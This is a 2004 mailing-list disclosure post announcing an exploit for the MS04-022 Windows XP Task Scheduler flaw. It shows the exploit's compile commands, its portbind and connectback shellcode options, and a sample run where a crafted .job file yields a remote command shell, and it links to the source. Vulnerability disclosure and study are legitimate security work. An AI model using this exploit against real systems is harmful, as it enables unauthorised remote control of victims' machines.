[Full-Disclosure] (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit

From: pigrelax (pigrelax_at_yandex.ru)
Date: 07/31/04

    To: <full-disclosure@lists.netsys.com>
    Date: Sat, 31 Jul 2004 10:34:20 +0400
    
    

    Hi all!

    Microsoft Windows XP Task Scheduler (.job) Universal Exploit

    * Tested on:
     * - Internet Explorer 6.0 (SP1) (iexplore.exe)
     * - Explorer (explorer.exe)
     * - Windows XP SP0, SP1
     *
     * -------------------------------------------------------------------
     * Compile:
     * Win32/VC++ : cl HOD-ms04022-task-expl.c
     * Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
     * Linux : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
     *
     * -------------------------------------------------------------------
     * Command Line Parameters/Arguments:
     *
     * HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
     *
     * Shellcode:
     * 1 - Portbind shellcode
     * 2 - Connectback shellcode
     *
     * -------------------------------------------------------------------
     * Example:
     *
     * C:\>HOD-ms04022-task-expl.exe expl.job 1 7777
     *
     * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
     *
     * --- Coded by .::[ houseofdabus ]::. ---
     *
     * [*] Shellcode: Portbind, port = 7777
     * [*] Generate file: expl.job
     *
     * C:\>
     *
     * start IE -> C:\
     *
     * C:\>telnet localhost 7777
     * Microsoft Windows XP [Версия 5.1.2600]
     * (С) Корпорация Майкрософт, 1985-2001.
     *
     * C:\Documents and Settings\v.X\Рабочий стол>
     *

    http://www.securitylab.ru/46820.html


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

